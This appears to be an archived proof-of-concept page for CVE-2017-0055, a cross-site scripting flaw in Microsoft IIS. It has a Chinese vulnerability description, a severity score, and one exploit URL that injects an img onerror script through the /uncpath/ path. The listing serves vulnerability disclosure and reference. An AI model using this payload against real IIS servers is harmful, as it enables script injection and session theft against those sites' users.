Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2017-0055 PoC — Microsoft Windows Internet Information Server 跨站脚本漏洞

Source
Associated Vulnerability
Title:Microsoft Windows Internet Information Server 跨站脚本漏洞 (CVE-2017-0055)
Description:Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。IIS Server是其中的一个运行于其中的互联网基本服务。 Microsoft Windows中的IIS Server存在跨站脚本漏洞。远程攻击者可利用该漏洞读取未授权的内容、以用户身份执行操作,以及在浏览器中注入恶意内容。以下版本受到影响:Windows Vista SP2,Windows Server 2008 SP2和R2,Windows 7 SP1,Windows 8.1,Windows Server 2
Description
This it's a PoC of Departament of justice VDP. By rootkit
Readme

# CVE-2017-0055 PoC

MICROSOFT IIS 7.0/7.5/8.0/8.5/10 /UNCPATH/ CROSS SITE SCRIPTING

Reference: https://nvd.nist.gov/vuln/detail/CVE-2017-0055

Base Score: 6.1
Severity: Medium



## Exploit:
http://vulniis/uncpath/%3Cimg%20onerror=alert('xss')%20src=/%3E:/


File Snapshot

[4.0K] /data/pocs/f94ba4ab057c1bed182d2514e92645bb52b4db02 └── [ 262] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.